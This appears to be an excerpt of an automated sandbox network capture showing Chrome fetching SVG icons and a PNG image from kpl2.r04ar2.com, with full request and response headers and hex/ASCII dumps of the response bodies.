                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9ieIN1y%2BsmHoRBbTO1%2BCAN3DF8aiG8iSivpG4W6TWSeE03y7ZwdNdyBZzD2VIUcxFaOd47p6g5p6Fo6cIaduBsu4OpKm3k519b%2FtSktzPX%2BdhBG%2BUzgZoKQBD%2F4YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6564389a80d0-EWR
                                                          2024-08-27 22:11:13 UTC698INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                          Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c
                                                          Data Ascii: 2.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,
                                                          2024-08-27 22:11:13 UTC845INData Raw: 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39
                                                          Data Ascii: .758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279
                                                          2024-08-27 22:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.449871188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1106OUTGET /ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC655INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0RZbF%2FtYLoC%2F7Zfwp2Q%2FsvzngWEN%2BIWTj1yJcK6BuIEew9nAitmlEkgK57n%2FGKJbF1lGJfFdFVcBLo%2FCENFBgjzTXLP8BMKrT69RFRm4UnaIv1Pm21pgCBCRBUhfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65645e3a0f37-EWR
                                                          2024-08-27 22:11:13 UTC714INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                          Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39
                                                          Data Ascii: 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.9
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32
                                                          Data Ascii: 02 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36
                                                          Data Ascii: 1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31
                                                          Data Ascii: 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21
                                                          2024-08-27 22:11:13 UTC1208INData Raw: 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37
                                                          Data Ascii: 77L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047
                                                          2024-08-27 22:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          75192.168.2.449872188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1540OUTGET /opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC675INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 29796
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iWKX1%2B4yqhmZs3Rbd22Y7RS7lAEroMg11LZo3v8LUK544Lyd6p5g3FcKZDRGGRnVBECiOEgr5GofpfjyNBsoL3MZRBd5cJqBUuYQEaIb5An0GDPLRiyijMB2v03qFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f656459b20ca8-EWR
                                                          2024-08-27 22:11:13 UTC694INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                          Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b
                                                          Data Ascii: "))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2
                                                          Data Ascii: 3g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSF
                                                          2024-08-27 22:11:13 UTC1369INData Raw: a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81
                                                          Data Ascii: }&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT
                                                          2024-08-27 22:11:13 UTC1369INData Raw: e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93
                                                          Data Ascii: #Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9
